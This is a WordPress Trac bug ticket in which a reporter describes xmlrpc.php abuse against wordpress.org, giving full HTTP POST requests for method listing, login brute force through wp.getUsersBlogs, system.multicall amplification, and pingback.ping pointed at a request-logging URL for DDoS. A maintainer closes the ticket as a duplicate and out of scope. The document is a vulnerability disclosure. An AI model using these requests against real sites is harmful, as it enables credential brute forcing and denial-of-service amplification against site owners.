WordPress.org

Make WordPress Core

Opened 7 months ago

Closed 7 months ago

#47856 closed defect (bug) (duplicate)

I found that productivity should be turned off from the beginning or minimized possible harmful functions but it still exists in wordpress.org/xmlrpc.php like Multi brute force and DDoS attack. If you check the data correctly, you will see its search hazard.

Reported by: victim01 Owned by:
Milestone: Priority: normal
Severity: normal Version:
Component: XML-RPC Keywords:
Focuses: rest-api Cc:

Description (last modified by SergeyBiryukov)

## I found that productivity should be turned off from the beginning or minimized possible harmful functions but it still exists in wordpress.org/xmlrpc.php like Multi brute force and DDoS attack. If you check the data correctly, you will see its search hazard.

1.First with the payload I list the available methods and can be exploited like:
-wp.getUserBlogs
-wp.getC loại
-metaWeblog.getUsersBlogs
-system.multicall
-pingback.ping

POST /xmlrpc.php HTTP/1.1
Host: wordpress.org
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 141 

<?xml version="1.0" encoding="UTF-8"?> 
<methodCall> 
<methodName> system.listMethods </methodName> 
<params> </params> 
</methodCall> 

## Bruceforce attack
The first place I can exploit is brute force login!

POST /xmlrpc.php HTTP/1.1
Host: wordpress.org
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 208 
 
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>
  1. Now I can easily log in with different methods by available methods, and I can write a code to attack it with the existing user and password. That will take a lot of time but will have results. It can happen faster when you read my third item !!!

##DdoS attack
Method pingback.ping

The intend of Pingback is to notify a site that you link to about the link hoping that the site you are linking to will return the favor. Some systems automate this and maintain automated lists linking back to sites that covered their article. In order to implement pingback, WordPress implements an XML-RPC API function. This function will then send a request to the site to which you would like to send a "pingback".
However, an attacker can take advantage of it to walk around DDos attacks that affect the service.

POST /xmlrpc.php HTTP/1.1
Host: wordpress.org
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 249 

<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://requestbin.net/r/1ak1hs11</string></value>
</param><param><value><string>https://wordpress.org/news/</string>
</value></param></params>
</methodCall>

##Multicall
This increases the attack capability of methods, for example when attacking bruteforce
The vulnerability can easily be abused by a simple script to try a significant number of username and password combinations with a relatively small number of HTTP requests. The following diagram shows a 4-fold increase in login attempts to HTTP requests, but this can trivially be expanded to a thousand logins.

POST /xmlrpc.php HTTP/1.1
Host: wordpress.org
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 929 

<?xml version="1.0"?>
<methodCall>
<methodName>system.multicall</methodName>
<params>
  <param><value><array><data>
  <value><struct>
  <member>
	<name>methodName</name>
	<value><string>wp.getUsersBlogs</string></value>
  </member>
  <member>
	<name>params</name><value><array><data>
	<value><array><data>
	<value><string>admin</string></value>
	<value><string>password</string></value>
	</data></array></value>
	</data></array></value>
  </member>
  </struct></value>
  <value><struct>
  <member>
	<name>methodName</name>
	<value><string>wp.getUsersBlogs</string></value>
  </member>
  <member>
	<name>params</name>
	<value><array><data>
	<value><array><data>
	  <value><string>admin</string></value>
	  <value><string>password</string></value>
	  </data></array></value>
	</data></array></value>
  </member>
  </struct></value>
  </data></array></value>
  </param>
</params>
</methodCall>

What about combining it with some other way? For pingback methods, for example. It increases time and danger !!
During testing, I was able to call the method wp.getUserBlogs 1,000 times in a single HTTP request (limited only by PHP memory issues). If a user creates a simple shell loop that executes one thousand times and runs a PHP script that crafts an HTTP request with one thousand method calls all requiring authentication, then that user would be able to try one million unique logins in a very short period of time.

This makes brute forcing the login very fast and can run down a pretty large wordlist in a short period of time. Also note that the wp.getUserBlogs method isn’t the only RPC call requiring authentication. It’s possible to use any RPC method which requires authentication to attempt logins and brute force the WordPress credentials.

Damage from the above holes is the damage to the remains that need to be patched. You can remove it if not needed. Or minimize the methods that can cause injury as the above methods !!!
##NOTE:
+A nice stop gap to this as well, block all *.php requests in your WAF if you can.All of our legitimate requests for WP are relative links with the ".php" chopped off. By blocking *.php at WAF we are actually blocking 99.7% of all automated scanners and botnet traffic looking for WP sites.
+Turn off some dangerous functions

##Document:
https://medium.com/@the.bilal.rizwan/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32
https://blog.sucuri.net/2015/10/brute-force-amplification-attacks-against-wordpress-xmlrpc.html
https://blog.cloudflare.com/a-look-at-the-new-wordpress-brute-force-amplification-attack/


Attachments (1)

report3.rar (424.6 KB) - added by victim01 7 months ago.
POC

Download all attachments as: .zip

Change History (2)

@victim01
7 months ago

POC

#1 @SergeyBiryukov
7 months ago

  • Component changed from General to XML-RPC
  • Description modified (diff)
  • Milestone Awaiting Review deleted
  • Resolution set to duplicate
  • Status changed from assigned to closed

Hi @victim01, welcome to WordPress Trac!

A DoS (Denial of Service) against xmlrpc.php is no different to one against the homepage or wp-login.php, preventing it is out of scope for WordPress. Caching and security plugins often attempt to cover this well, but ultimately it's a issue that needs to be handled at the server level.

See #35532, #36806, #24193, and other similar tickets.

See also #34336 for some details on system.multicall.

Additionally, when writing this ticket you should have seen this notice:

Do not report potential security vulnerabilities here.
See the Security FAQ and visit the WordPress HackerOne program.

Note: See TracTickets for help on using tickets.